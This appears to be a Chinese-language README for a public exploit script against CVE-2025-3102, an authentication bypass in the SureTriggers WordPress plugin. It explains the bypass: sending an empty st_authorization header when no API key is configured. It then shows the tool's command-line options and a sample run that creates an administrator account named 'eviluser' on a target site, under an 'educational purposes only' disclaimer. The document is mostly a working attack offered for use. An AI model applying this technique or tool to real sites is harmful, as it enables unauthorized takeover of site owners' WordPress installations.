🚨 CVE-2025-3102 是一个影响 SureTriggers: All-in-One Automation Platform WordPress 插件的严重身份验证绕过漏洞,该插件已活跃安装在超过 100,000 个网站上。由于该漏洞的性质和部署规模,此漏洞构成了重大的安全风险。
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HWordPress 的 SureTriggers 插件存在一个身份验证绕过漏洞,允许未经身份验证的攻击者创建管理员账户。这是因为在 autheticate_user 函数中对 secret_key 缺少空值检查。
当插件已安装并激活,但未配置 API 密钥时,攻击者可以通过发送空的 st_authorization 头来绕过身份验证,从而触发为已认证用户保留的操作。
提供了一个 Python 脚本来自动化利用此漏洞。
该脚本允许你在易受攻击的站点上生成一个新的管理员用户。
readme.txt 自动检测插件版本st_authorization 头绕过身份验证usage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
此脚本仅供教育目的使用。
未经明确许可,在目标上未经授权使用此代码是非法的。
作者对任何滥用或造成的损害不承担任何责任。
作者: Nxploited ( Khaled Alenazi )